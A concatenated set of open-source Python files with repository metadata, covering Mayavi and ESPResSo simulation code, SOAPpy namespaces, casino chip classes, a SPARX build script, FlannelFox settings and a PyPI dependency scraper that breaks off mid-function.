def has_output_port(self):
""" Return True as the reader has output port."""
return True
def get_output_object(self):
""" Return the reader output port."""
return self.reader.output_port
######################################################################
# Non-public interface
######################################################################
def _base_name_changed(self, value):
if len(value) == 0:
return
else:
self.reader.base_name = value
self._update_reader_output()
def _update_reader_output(self):
self.reader.update()
self.reader.update_information()
self.reader.on_trait_change(self.render)
self.outputs = [self.reader.output]
self.data_changed = True
| dmsurti/mayavi | mayavi/sources/chaco_reader.py | Python | bsd-3-clause | 2,647 | [
"Mayavi",
"VTK"
] | 55b6088d116a6eeae75101c2156221760942f4fda3a27333cb1d2d8e068e96f8 |
from __future__ import nested_scopes
"""
################################################################################
#
# SOAPpy - Cayce Ullman (cayce@actzero.com)
# Brian Matthews (blm@actzero.com)
# Gregory Warnes (Gregory.R.Warnes@Pfizer.com)
# Christopher Blunck (blunck@gst.com)
#
################################################################################
# Copyright (c) 2003, Pfizer
# Copyright (c) 2001, Cayce Ullman.
# Copyright (c) 2001, Brian Matthews.
#
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# Neither the name of actzero, inc. nor the names of its contributors may
# be used to endorse or promote products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
################################################################################
"""
ident = '$Id: NS.py 1468 2008-05-24 01:55:33Z warnes $'
from version import __version__
##############################################################################
# Namespace Class
################################################################################
def invertDict(dict):
d = {}
for k, v in dict.items():
d[v] = k
return d
class NS:
XML = "http://www.w3.org/XML/1998/namespace"
ENV = "http://schemas.xmlsoap.org/soap/envelope/"
ENC = "http://schemas.xmlsoap.org/soap/encoding/"
XSD = "http://www.w3.org/1999/XMLSchema"
XSD2 = "http://www.w3.org/2000/10/XMLSchema"
XSD3 = "http://www.w3.org/2001/XMLSchema"
XSD_L = [XSD, XSD2, XSD3]
EXSD_L= [ENC, XSD, XSD2, XSD3]
XSI = "http://www.w3.org/1999/XMLSchema-instance"
XSI2 = "http://www.w3.org/2000/10/XMLSchema-instance"
XSI3 = "http://www.w3.org/2001/XMLSchema-instance"
XSI_L = [XSI, XSI2, XSI3]
URN = "http://soapinterop.org/xsd"
# For generated messages
XML_T = "xml"
ENV_T = "SOAP-ENV"
ENC_T = "SOAP-ENC"
XSD_T = "xsd"
XSD2_T= "xsd2"
XSD3_T= "xsd3"
XSI_T = "xsi"
XSI2_T= "xsi2"
XSI3_T= "xsi3"
URN_T = "urn"
NSMAP = {ENV_T: ENV, ENC_T: ENC, XSD_T: XSD, XSD2_T: XSD2,
XSD3_T: XSD3, XSI_T: XSI, XSI2_T: XSI2, XSI3_T: XSI3,
URN_T: URN}
NSMAP_R = invertDict(NSMAP)
STMAP = {'1999': (XSD_T, XSI_T), '2000': (XSD2_T, XSI2_T),
'2001': (XSD3_T, XSI3_T)}
STMAP_R = invertDict(STMAP)
def __init__(self):
raise Error, "Don't instantiate this"
| nzsquirrell/p2pool-myriad | oldstuff/SOAPpy/NS.py | Python | gpl-3.0 | 3,724 | [
"Brian"
] | 7187143df3653840e54c01ca340fee44ebd029814e1bdbd3b69317a710bbcdc1 |
#
# Copyright (C) 2013,2014 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Tests particle property setters/getters
import unittest as ut
import espressomd
import numpy as np
from espressomd.interactions import LennardJonesInteraction
class Non_bonded_interactionsTests(ut.TestCase):
# def __init__(self,particleId):
# self.pid=particleId
# Handle to espresso system
es = espressomd.System()
def intersMatch(self, inType, outType, inParams, outParams):
"""Check, if the interaction type set and gotten back as well as the bond
parameters set and gotten back match. Only check keys present in
inParams.
"""
if inType != outType:
print("Type mismatch:", inType, outType)
return False
for k in inParams.keys():
if k not in outParams:
print(k, "missing from returned parameters")
return False
if outParams[k] != inParams[k]:
print("Mismatch in parameter ", k, inParams[k], outParams[k])
return False
return True
def generateTestForNon_bonded_interaction(_partType1, _partType2, _interClass, _params, _interName):
"""Generates test cases for checking interaction parameters set and gotten back
from Es actually match. Only keys which are present in _params are checked
1st and 2nd arg: Particle type ids to check on
3rd: Class of the interaction to test, ie.e, FeneBond, HarmonicBond
4th: Interaction parameters as dictionary, i.e., {"k"=1.,"r_0"=0.
5th: Name of the interaction property to set (i.e. "lennardJones")
"""
partType1 = _partType1
partType2 = _partType2
interClass = _interClass
params = _params
interName = _interName
def func(self):
# This code is run at the execution of the generated function.
# It will use the state of the variables in the outer function,
# which was there, when the outer function was called
# Set parameters
getattr(self.es.non_bonded_inter[partType1, partType2], interName).set_params(
**params)
# Read them out again
outInter = getattr(
self.es.non_bonded_inter[partType1, partType2], interName)
outParams = outInter.get_params()
self.assertTrue(self.intersMatch(interClass, type(outInter), params, outParams), interClass(
**params).type_name() + ": value set and value gotten back differ for particle types " + str(partType1) + " and " + str(partType2) + ": " + params.__str__() + " vs. " + outParams.__str__())
return func
test_lj1 = generateTestForNon_bonded_interaction(
0, 0, LennardJonesInteraction,
{"epsilon": 1., "sigma": 2., "cutoff": 3.,
"shift": 4., "offset": 5., "min": 7.},
"lennard_jones")
test_lj2 = generateTestForNon_bonded_interaction(
0, 0, LennardJonesInteraction,
{"epsilon": 1.3, "sigma": 2.2, "cutoff": 3.4,
"shift": 4.1, "offset": 5.1, "min": 7.1},
"lennard_jones")
test_lj3 = generateTestForNon_bonded_interaction(
0, 0, LennardJonesInteraction,
{"epsilon": 1.3, "sigma": 2.2, "cutoff": 3.4,
"shift": 4.1, "offset": 5.1, "min": 7.1},
"lennard_jones")
test_ljgen1 = generateTestForNon_bonded_interaction(
0, 0, GenericLennardJonesInteraction,
{"epsilon": 1., "sigma": 2., "cutoff": 3., "shift": 4., "offset": 5.,
"e1": 7, "e2": 8, "b1": 9., "b2": 10., "lambda": 11., "delta": 12.},
"generic_lennard_jones")
test_ljgen2 = generateTestForNon_bonded_interaction(
0, 0, GenericLennardJonesInteraction,
{"epsilon": 1.1, "sigma": 2.1, "cutoff": 3.1, "shift": 4.1, "offset": 5.1,
"e1": 71, "e2": 81, "b1": 9.1, "b2": 10.1, "lambda": 11.1, "delta": 12.1},
"generic_lennard_jones")
test_ljgen3 = generateTestForNon_bonded_interaction(
0, 0, GenericLennardJonesInteraction,
{"epsilon": 1.2, "sigma": 2.2, "cutoff": 3.2, "shift": 4.2, "offset": 5.2,
"e1": 72, "e2": 82, "b1": 9.2, "b2": 10.2, "lambda": 11.2, "delta": 12.2},
"generic_lennard_jones")
def test_forcecap(self):
self.es.non_bonded_inter.set_force_cap(17.5)
self.assertEqual(self.es.non_bonded_inter.get_force_cap(), 17.5)
if __name__ == "__main__":
print("Features: ", espressomd.features())
ut.main()
| sehrhardt/espresso | testsuite/python/nonBondedInteractions.py | Python | gpl-3.0 | 5,205 | [
"ESPResSo"
] | 6f8f1b95a9d9423902777dd5704601f4cf7fc023bb314c49e1f299a29f1e2d45 |
#Chip.py
#Implements a casino chip, which is used for betting on games.
#Created by: Andrew Davis
#Created on: 1/9/2016
#Open source (MIT license)
#import statements
from Utilities import get_chip_color
#class declaration for Chip superclass
class Chip(object):
"""A Chip is a representation of money in fixed
denominations, used for betting in a casino."""
#constructor
def __init__(self, value):
self.__value = value #initialize the value field
self.__color = get_chip_color(value) #initialize the color field
#representation method and string method
def __repr__(self):
return "a " + self.__color + " $" + str(self.__value) + " chip" #return a description of the chip
def __str__(self):
return self.__repr__() #use the representation method
#getters
def get_value(self):
return self.__value #return the value instance variable
def get_color(self):
return self.__color #return the color instance variable
value = property(get_value) #create the getter property for the value
color = property(get_color) #create the getter property for the color
#class declarations for Chip subclasses
#WhiteChip class - defines a $1 chip
class WhiteChip(Chip):
def __init__(self):
super(WhiteChip, self).__init__(1) #initialize a chip with a value of $1
#RedChip class - defines a $5 chip
class RedChip(Chip):
def __init__(self):
super(RedChip, self).__init__(5) #initialize a chip with a value of $5
#GreenChip class - defines a $25 chip
class GreenChip(Chip):
def __init__(self):
super(GreenChip, self).__init__(25) #initialize a chip with a value of $25
#BlueChip class - defines a $50 chip
class BlueChip(Chip):
def __init__(self):
super(BlueChip, self).__init__(50) #initialize a chip with a value of $50
#BlackChip class - defines a $100 chip
class BlackChip(Chip):
def __init__(self):
super(BlackChip, self).__init__(100) #initialize a chip with a value of $100
#PurpleChip class - defines a $500 chip
class PurpleChip(Chip):
def __init__(self):
super(PurpleChip, self).__init__(500) #initialize a chip with a value of $500
#YellowChip class - defines a $1000 chip
class YellowChip(Chip):
def __init__(self):
super(YellowChip, self).__init__(1000) #initialize a chip with a value of $1000
#GrayChip class - defines a $5000 chip
class GrayChip(Chip):
def __init__(self):
super(GrayChip, self).__init__(5000) #initialize a chip with a value of $5000
| techgineer/casino-sim | src/Chip.py | Python | mit | 2,552 | [
"CASINO"
] | d60f11f990653d8277c9ca89f2ce32e34a92857cfa35e8e931e679f038c464ca |
#! /bin/env python
# Python Distutils setup script for SPARX
# VERSION_NUMBER of SPARX
VERSION_NUMBER = '3.1.3'
# number of Thread using in per job
ENABLE_MULTITREADING = 1
if ENABLE_MULTITREADING:
import multiprocessing
NumberOfThread = 2 * multiprocessing.cpu_count()
else:
NumberOfThread = 1
print 'Number Of Thread =',NumberOfThread
# Some necessary imports
import os, glob
from os.path import exists, realpath, expanduser
# Test for MPI by checking whether mpicc can be called
from subprocess import call, Popen, PIPE
if not exists('unit_tests/tmp'):
os.makedirs('unit_tests/tmp')
HAVE_MPI = (call("mpicc src/mpi-test.c -o unit_tests/tmp/a.out", shell=True, stdout=PIPE, stderr=PIPE) == 0)
# Get svn revision and update VERSION
import time
p = Popen("svnversion", shell=True, stdout=PIPE)
REV = p.communicate()[0].strip()
fo = file("lib/sparx/VERSION", "w")
fo.write("%s (r%s, %s)"%(VERSION_NUMBER,REV, time.asctime()))
fo.close()
##
## Gather information for setting up the package
##
# Get Python paths
import sys
PYINC = sys.prefix+"/include"
PYLIB = sys.prefix+"/lib"
if not (exists(PYINC) and exists(PYLIB)):
raise Exception, "Cannot locate Python include and lib directories"
# Get NumPy paths
import numpy
NPINC = numpy.get_include()
# MIRIAD support option
MIRSUPPORT = 1 if os.environ.get('MIRLIB') is not None else 0
# Get Miriad paths
if MIRSUPPORT:
MIRINC = os.getenv("MIRINC")
MIRLIB = os.getenv("MIRLIB")
if not (MIRINC and MIRLIB):
raise Exception, "MIRIAD environment variables not present, cannot locate Miriad headers or libraries"
MIRINC1 = realpath(MIRINC+"/../pgplot-miriad-remix")
MIRINC2 = realpath(MIRINC+"/../miriad-c")
if not (exists(MIRINC1) and exists(MIRINC2)):
raise Exception, "MIRIAD include paths '%s' and '%s' not present, cannot continue"%(MIRINC1, MIRINC2)
# Check for additional search paths specified by user
SPARXVERSION='sparx'
SPARX_VERSION='sparx'
USER_INCLUDE = []
USER_LIB = []
args = sys.argv[:]
mpi_libs = ['mpi']
for arg in args:
if arg.find('--with-include=') == 0:
USER_INCLUDE += [expanduser(arg.split('=')[1])]
sys.argv.remove(arg)
elif arg.find('--with-lib=') == 0:
USER_LIB += [expanduser(arg.split('=')[1])]
sys.argv.remove(arg)
elif arg.find('--no-mpi') == 0:
HAVE_MPI = False
sys.argv.remove(arg)
elif arg.find('--lam') == 0:
mpi_libs = ['lammpio', 'mpi', 'lam']
sys.argv.remove(arg)
elif arg.find('--mpich') == 0:
mpi_libs = ['mpich', 'pgc', 'pgftnrtl', 'pgftnrtl', 'nspgc', 'pgc', 'rt']
sys.argv.remove(arg)
elif arg.find('--version') == 0:
SPARXVERSION += '-'+expanduser(arg.split('=')[1])
SPARX_VERSION += '_'+expanduser(arg.split('=')[1])
sys.argv.remove(arg)
# Define macros
macros = [
('NTHREAD', str(NumberOfThread)),
('MIRSUPPORT', MIRSUPPORT),
('SPARXVERSION', '\"' + SPARXVERSION + '\"' ),
('SPARX_VERSION', '\"' + SPARX_VERSION + '\"' ),
]
if not HAVE_MPI:
print\
'''
NO MPI SUPPORT!
'''
else:
print\
'''
MPI support available
'''
# Compiler flags
compiler_flags = [
'-std=c99',
# '-pedantic',
'-fshort-enums',
'-fno-common',
'-Dinline=',
'-g',
'-rdynamic',
'-O3',
'-pthread',
# '-Werror',
'-Wall',
# '-W',
'-Wmissing-prototypes',
'-Wstrict-prototypes',
'-Wpointer-arith',
'-Wcast-qual',
'-Wcast-align',
'-Wwrite-strings',
'-Wnested-externs',
#'-finline-limit=600',
#'-fwhole-program',
'-ftree-vectorize',
]
# Header directories
header_dirs = [
'src',
PYINC,
NPINC,
]+USER_INCLUDE
if MIRSUPPORT:
header_dirs += [ MIRINC1, MIRINC2]
# Library directories
lib_dirs = [
PYLIB,
]+USER_LIB
if MIRSUPPORT:
lib_dirs += [
MIRLIB
]
# Libraries to link to
libs = [
'X11',
'm',
'gsl',
'gslcblas',
'fftw3',
'hdf5',
'hdf5_hl',
'cfitsio'
]
if MIRSUPPORT:
libs += [
'cpgplot',
'pgplot',
'mir',
'mir_uvio',
'mir_linpack'
]
# Base source files
sources_base = [
'src/data_structs.c',
'src/debug.c',
'src/error.c',
'src/geometry.c',
'src/kappa.c',
'src/memory.c',
'src/molec.c',
'src/numerical.c',
'src/physics.c',
'src/python-wrappers.c',
'src/zone.c',
'src/zone-hdf5.c',
'src/fits-and-miriad-wrappers.c',
'src/vtk-wrapper.c',
]
if MIRSUPPORT:
sources_base += [
'src/cpgplot-wrappers.c'
]
# Base dependencies
depends_base = [
'src/data_structs.h',
'src/debug.h',
'src/error.h',
'src/geometry.h',
'src/kappa.h',
'src/memory.h',
'src/fits-and-miriad-wrappers.h',
'src/molec.h',
'src/numerical.h',
'src/physics.h',
'src/python-wrappers.h',
'src/zone.h',
'src/zone-hdf5.h',
'src/vtk-wrapper.h',
]
if MIRSUPPORT:
depends_base += [
'src/cpgplot-wrappers.h'
]
# SPARX sources files
sources_sparx = [
'src/sparx-python.c',
#'src/sparx-test.c',
'src/sparx-model.c',
'src/sparx-physics.c',
'src/sparx-inputs.c',
'src/sparx-io.c',
'src/sparx-utils.c',
'src/sparx-ImageTracing.c',
]
# SPARX dependencies
depends_sparx = ['src/sparx.h']
##
## Distutils setup
##
from distutils.core import setup, Extension
from distutils import ccompiler, unixccompiler
#os.environ["CXX"] = "icc"
#os.environ["CC"] = "icc"
# Things to include if MPI is available
if HAVE_MPI:
macros += [('HAVE_MPI', None)]
libs += mpi_libs
#libs += ['lammpio', 'mpi', 'lam']
#libs += ['mpich', 'pgc', 'pgftnrtl', 'pgftnrtl', 'nspgc', 'pgc', 'rt']
#os.environ['CC'] = "mpicc"
# Definition for the _sparx extension module
ext_sparx = Extension( SPARX_VERSION + '._sparx' ,
sources = sources_base+sources_sparx+[
'src/sparx-pyext-_sparx.c',
'src/sparx-task-amc.c',
'src/sparx-task-telsim.c',
'src/sparx-task-contobs.c',
'src/sparx-task-coldens.c',
'src/sparx-task-visual.c',
'src/sparx-task-pops2ascii.c',
#'src/sparx-task-pygrid.c',
'src/sparx-task-template.c',
],
depends = ['setup.py']+depends_base+depends_sparx,
extra_compile_args = compiler_flags,
define_macros = macros,
include_dirs = header_dirs,
library_dirs = lib_dirs,
libraries = libs
)
# The main setup call
setup(
name = 'sparx',
version = VERSION_NUMBER,
author = 'Eric Chung & I-Ta Hsieh',
author_email = 'schung@asiaa.sinica.edu.tw / ita.hsieh@gmail.com',
#url = 'http://esclab.tw/wiki/index.php/Category:SPARX',
url = 'https://github.com/itahsieh/sparx-alpha',
description = 'SPARX Platform for Astrophysical Radiative Xfer',
packages = [SPARX_VERSION],
package_dir = { SPARX_VERSION : "lib/sparx"},
package_data = { SPARX_VERSION : [
'data/molec/*.dat', # Molecular data files
'data/opacity/*.tab', # Opacity data files
'VERSION', # Program version
]},
ext_modules = [ext_sparx],
scripts = [
'bin/presparx', # SPARX preprocessor
'bin/sparx', # Main sparx command line driver
'bin/sparx-plot', # Model plotter
'bin/sparx-plot.py', # Model plotter
'bin/sparx-validate-dust.py', # Script for validating dust radiative transfer
'bin/sparx-validate-line.py', # Script for validating line radiative transfer
'bin/sparx-validate-leiden.py', # Script for validating with the Leiden 2004 benchmark problems
],
)
| itahsieh/sparx-alpha | setup.py | Python | gpl-3.0 | 7,096 | [
"VTK"
] | 4d6ba870b8e3f1a578169782604ffbb405cd91c7a5e4ac0d9bf52c8cd438db96 |
# Copyright (C) 2016
# Max Planck Institute for Polymer Research & JGU Mainz
# Copyright (C) 2012,2013
# Max Planck Institute for Polymer Research
# Copyright (C) 2008,2009,2010,2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
*********************
espressopp.io.DumpXYZ
*********************
* `dump()`
write configuration to trajectory XYZ file. By default filename is ``out.xyz``,
coordinates are folded. DumpXYZ works also for Multiple communicators.
**Properties**
* `filename`
Name of trajectory file. By default trajectory file name is ``out.xyz``
* `unfolded`
False if coordinates are folded, True if unfolded. By default - False
* `append`
True if new trajectory data is appended to existing trajectory file. By default - True
* `length_factor`
If length dimension in current system is nm, and unit is 0.23 nm, for example, then
``length_factor`` should be 0.23
Default: 1.0
* `length_unit`
It is length unit. Can be ``LJ``, ``nm`` or ``A``. By default - ``LJ``
* `store_pids`
True if you want to store pids as fastwritexyz does. False otherwise (standard XYZ)
Default: False
* `store_velocities`
True if you want to store velocities. False otherwise (XYZ doesn't require it)
Default: False
usage:
writing down trajectory
>>> dump_conf_xyz = espressopp.io.DumpXYZ(system, integrator, filename='trajectory.xyz')
>>> for i in range (200):
>>> integrator.run(10)
>>> dump_conf_xyz.dump()
writing down trajectory using ExtAnalyze extension
>>> dump_conf_xyz = espressopp.io.DumpXYZ(system, integrator, filename='trajectory.xyz')
>>> ext_analyze = espressopp.integrator.ExtAnalyze(dump_conf_xyz, 10)
>>> integrator.addExtension(ext_analyze)
>>> integrator.run(2000)
Both examples will give the same result: 200 configurations in trajectory .xyz file.
setting up length scale
For example, the Lennard-Jones model for liquid argon with :math:`\sigma=0.34 [nm]`
>>> dump_conf_xyz = espressopp.io.DumpXYZ(system, integrator, filename='trj.xyz', \
>>> unfolded=False, length_factor=0.34, \
>>> length_unit='nm', store_pids=True, \
>>> store_velocities = True, append=True)
will produce trj.xyz with in nanometers
.. function:: espressopp.io.DumpXYZ(system, integrator, filename=out.xyz, unfolded=False,\
length_factor=1.0, length_unit='LJ', store_pids=False,\
store_velocities=False, append=True)
:param system:
:param integrator:
:param filename:
:param bool unfolded:
:param real length_factor:
:param length_unit:
:param bool store_pids:
:param bool store_velocities:
:param bool append:
:type system:
:type integrator:
:type filename:
:type length_unit:
.. function:: espressopp.io.DumpXYZ.dump()
:rtype:
"""
from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.ParticleAccess import *
from _espressopp import io_DumpXYZ
class DumpXYZLocal(ParticleAccessLocal, io_DumpXYZ):
def __init__(self, system, integrator, filename='out.xyz', unfolded=False, length_factor=1.0, length_unit='LJ', store_pids=False, store_velocities=False, append=True):
cxxinit(self, io_DumpXYZ, system, integrator, filename, unfolded, length_factor, length_unit, store_pids, store_velocities, append)
def dump(self):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
self.cxxclass.dump(self)
if pmi.isController :
class DumpXYZ(ParticleAccess, metaclass=pmi.Proxy):
pmiproxydefs = dict(
cls = 'espressopp.io.DumpXYZLocal',
pmicall = [ 'dump' ],
pmiproperty = ['filename', 'unfolded', 'length_factor', 'length_unit', 'store_pids', 'store_velocities', 'append']
)
| espressopp/espressopp | src/io/DumpXYZ.py | Python | gpl-3.0 | 4,709 | [
"ESPResSo"
] | 91b669149e0084691c70a29c6d1072afa40cdbdc607c4fc7f4440a88ef92ac18 |
# -*- coding: utf-8 -*-
import os, json
import flannelfox.tools
from collections import OrderedDict
if os.environ.get('FF_ROOT', False):
HOME_DIR = os.environ.get('FF_ROOT')
else:
HOME_DIR = os.path.expanduser('~')
# #############################################################################
# Special variables to handle formatting names
# #############################################################################
# These are torrentTitle prefixes that should be ignored when creating torrent
# objects. This is mainly to fix rss feeds that have bad file entries in front.
BAD_PREFIXES = [
'autofill fail',
'TvHD \d+ \d+',
'TvSD \d+ \d+'
]
# These are keywords such as sources that come in multiple forms, but need to
# be reconciled into one to make it easier to grab them
# ORDER IS IMPORTANT
KEYWORD_SYNONYMS = OrderedDict([
('blu\-ray','bluray'),
('bdrip','bluray'),
('brrip','bluray'),
('hd\-dvd','hddvd'),
('web\-dl','webdl'),
('web\-rip','webrip'),
('x264','h264'),
('h.264','h264'),
('h264.?hi10p','h264hi10p'),
('vc\-1','vc1'),
('v0 ?\(?vbr\)?','v0vbr'),
('v1 ?\(?vbr\)?','v1vbr'),
('v2 ?\(?vbr\)?','v2vbr'),
('v8 ?\(?vbr\)?','v8vbr'),
('aps ?\(?vbr\)?','apsvbr'),
('apx ?\(?vbr\)?','apxvbr')
])
# This is a list of properties that are ignored during torrent comparison
FUZZY_PROPERTIES = [
# Properties ignored in a comparison, in order to achieve a preference
# of certain quality then you need to make the source feed "upgradable"
'quality',
'source',
'container',
'codec',
# Properties ignored due to being related to RSS
'torrentTitle',
'url',
# Properties ignored due to being related to storage
'feedDestination',
# Properties ignored due to being based on ratio/timing
'addedOn',
'added',
'queuedOn',
'minTime',
'minRatio',
'comparison',
'hashString',
# Properties ignored due to being based on transmission responses
'id',
'error',
'errorString',
'uploadRatio',
'percentDone',
'doneDate',
'activityDate',
'rateUpload',
'downloadDir',
'seedTime',
'status'
]
# #############################################################################
settings = {
'files':{
'defaultTorrentLocation': os.path.join(HOME_DIR, 'files'),
'maxUsedSpaceDir': os.path.join(HOME_DIR, 'files'),
'privateDir': os.path.join(HOME_DIR, '.flannelfox'),
'configDir': os.path.join(HOME_DIR, '.flannelfox/config'),
'logDir': os.path.join(HOME_DIR, '.flannelfox/logs'),
'toolsDir': os.path.join(HOME_DIR, 'tools'),
'settingsConfigFile': os.path.join(HOME_DIR, '.flannelfox/config/settings.json'),
'feedConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds'),
'rssConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds/rssfeeds'),
'lastfmConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds/lastfmfeeds'),
'lastfmCacheDir': os.path.join(HOME_DIR, '.flannelfox/cache/LastfmArtistsConfigCache'),
'traktConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds/traktfeeds'),
'traktCacheDir': os.path.join(HOME_DIR, '.flannelfox/cache/TraktConfigCache'),
'goodreadsConfigDir': os.path.join(HOME_DIR, '.flannelfox/config/feeds/goodreadsfeeds'),
'goodreadsCacheDir': os.path.join(HOME_DIR, '.flannelfox/cache/GoodreadsConfigCache')
},
'apis':{
'lastfm':'https://ws.audioscrobbler.com/2.0',
'trakt':'https://api-v2launch.trakt.tv',
'goodreads':'https://www.goodreads.com'
},
'database':{
'defaultDatabaseEngine': 'SQLITE3'
},
'queueManagement':{
'maxTorrents': 300,
'maxDownloadingTorrents': 5,
'strictQueueManagement': False
},
'client':{
'name': 'transmission-server1',
'type': 'transmission',
'host': '127.0.0.1',
'https': False,
'port': '9091',
'rpcLocation': 'transmission/rpc',
'user': '',
'password': ''
},
'tvTitleMappings': {
'teen titans go':'teen titans go!',
'uncle buck':'uncle buck 2016',
'chicago p d':'chicago p.d.',
'chicago pd':'chicago p.d.',
'guardians of the galaxy':'marvels guardians of the galaxy',
'ultimate spider man vs the sinister 6':'ultimate spider man',
'marvels ultimate spider man vs the sinister 6':'ultimate spider man',
'scandal us':'scandal',
'scandal 2012':'scandal',
'doctor who':'doctor who 2005',
'house of cards 2013':'house of cards us',
'the flash':'the flash 2014',
'dcs legends of tomorrow':'dc\'s legends of tomorrow',
'dc s legends of tomorrow':'dc\'s legends of tomorrow',
'the magicians 2016':'the magicians 2015',
'the magicians us':'the magicians 2015',
'law and order special victims unit':'law and order: svu'
},
'debugLevel': 'info',
'minimumFreeSpace': 0,
'maxUsedSpace': 600,
'queueDaemonThreadSleep': 60,
'rssDaemonThreadSleep': 60,
'maxRssThreads': 8
}
def getSettings():
return settings
def readSettingsFile(settingsFile=settings['files']['settingsConfigFile']):
try:
with open(settingsFile,'r') as importedSettings:
return importedSettings.read()
except Exception:
return '{}'
def updateSettings(settingsFile=settings['files']['settingsConfigFile']):
importedSettings = readSettingsFile(settingsFile)
settings = flannelfox.tools.dictMerge(getSettings(), json.loads(importedSettings))
updateSettings() | FlannelFox/FlannelFox | flannelfox/settings.py | Python | mit | 5,166 | [
"Galaxy"
] | 35c49bc9c2452851ffb615eec50b81e0af72516212f56acb88fa8353fa50c545 |
"""Get dependencies from packages on the Python Package Index (PyPI)
Adapted from Olivier Girardot's notebook:
https://github.com/ogirardot/meta-deps/blob/master/PyPi%20Metadata.ipynb
licensed under the Creative Commons Attribution 3.0 Unported License.
To view a copy of that license, visit
http://creativecommons.org/licenses/by/3.0/
Changes:
- Read import statements in all .py files, instead of install_requires list in
setup.py
- Read zip files instead of tar files
- Don't produce graph
- Remove json
"""
import xmlrpc.client as xmlrpclib
import re, requests, csv, tarfile
def compression_type(filename):
""" Test which type of compressed file it is
adapted from http://stackoverflow.com/a/13044946 """
compression_dict = {
"\x1f\x8b\x08": "gz",
"\x42\x5a\x68": "bz2",
"\x50\x4b\x03\x04": "zip",
"\x1f\x9d": "tar"
}
max_len = max(len(x) for x in compression_dict)
try:
with open(filename) as f:
file_start = f.read(max_len)
except UnicodeDecodeError:
with open(filename, encoding="latin-1") as f:
file_start = f.read(max_len)
for sig, filetype in compression_dict.items():
if file_start.startswith(sig):
return filetype
return None
def extract_dependencies(content):
"""Extract dependencies by parsing import statements"""
deps = set()
for line in content.split('\n'):
line = line.strip() # we don't care about indentation
if not (line.startswith("from") or
line.startswith("import")):
continue
if (line.startswith('#') or line.startswith('"""') or
line.startswith("'''")):
continue
if '#' in line:
line = line.split("#", 1)[0].strip()
if line.startswith('from'): # from foo import bar
matches = re.findall("from (\w*?)(?: import)", line)
else: # import foo
matches = re.findall("import (\w*?)(?:$| as)", line)
for match in matches:
for x in match.split(','):
if not x.startswith('.'):
deps.add(x)
return deps
def _extract_content(package_file):
"""Extract content from compressed package - .py files only"""
try:
tar = tarfile.open(package_file)
except:
return None
filenames = tar.getnames()
py_files = [elem for elem in filenames if elem.endswith('.py')]
for py_file in py_files:
try:
content = tar.extractfile(py_file).read().decode()
yield content
except:
yield None
pyx_files = [elem for elem in filenames if elem.endswith('.pyx')]
if len(pyx_files) > 0:
yield 'import cython'
DEFAULT_CLIENT = xmlrpclib.ServerProxy('http://pypi.python.org/pypi')
def extract_package(name, to='pypi-deps.txt', client=DEFAULT_CLIENT):
tmpfilename = '/tmp/temp_py_package.tar.gz'
with open(to, 'a') as fout:
try:
releases = client.package_releases(name)
except Exception as e:
print(e, "internet connection issues?")
return
if len(releases) == 0:
return
release = client.package_releases(name)[0] # use only latest release
docs = client.release_urls(name, release)
if len(docs) > 0:
url = None
for doc in docs:
if doc['packagetype'] == 'sdist':
url = doc.get('url')
break
if url is None:
return
try:
req = requests.get(url)
if req.status_code == 200:
with open(tmpfilename, 'wb') as tar_file:
tar_file.write(req.content)
dependencies = set()
for content in _extract_content(tmpfilename):
if content is not None:
dependencies.update(extract_dependencies(content))
for dep in dependencies:
fout.write(name + '\t' + dep + '\n')
else:
print("Could not download {0}, status code {1}".format(url, req.status_code))
except ConnectionError:
print('ConnectionError: ', url)
if __name__ == '__main__':
import random
client = xmlrpclib.ServerProxy('http://pypi.python.org/pypi')
to='pypi-deps.txt'
packages = client.list_packages()
random.shuffle(packages)
# Check if package is already in the output file (useful for restarting after a failure)
try:
